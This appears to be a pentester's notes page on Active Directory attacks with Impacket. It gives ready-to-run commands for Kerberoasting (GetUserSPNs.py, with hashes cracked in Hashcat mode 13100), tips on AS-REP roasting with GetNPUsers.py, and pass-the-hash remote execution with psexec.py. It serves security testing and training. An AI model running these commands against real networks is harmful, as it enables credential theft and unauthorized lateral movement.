Kerberoasting

Kerberoasting with Impacket

Impacket can identify kerberoastable accounts and dump packets remotely. It comes standard with Kali Linux.

GetUserSPNs.py ${DOMAIN}/${USER}:${PASSWORD} \
	-dc-ip $DOMAIN_CONTROLLER_IP -request

The password hashes output here can then be cracked with Hashcat (use the 13100 hash mode).

Link to original

AS-REP roasting

AS-REP roasting with Impacket

Impacket (via GetNPUsers.py) support AS-REP roasting. However, GetNPUsers.py requires that user accounts already be enumerated and roastable accounts identified.

When using GetNPUsers.py, specify the target as ${DOMAIN}/ (i.e., leave off the user-part).

Link to original

PsExec

Impacket includes a reimplementation of PsExec. Under Linux (but not Windows) you can pass in an NTLM hash instead of a password for the target user.

# Psexec.py (but ONLY on Linux; this won't work on Windows!)
#
psexec.py -hashes $TARGET_USER_NTLM_HASH \
                  $TARGET_DOMAIN\$TARGET_USER@$TARGET_HOST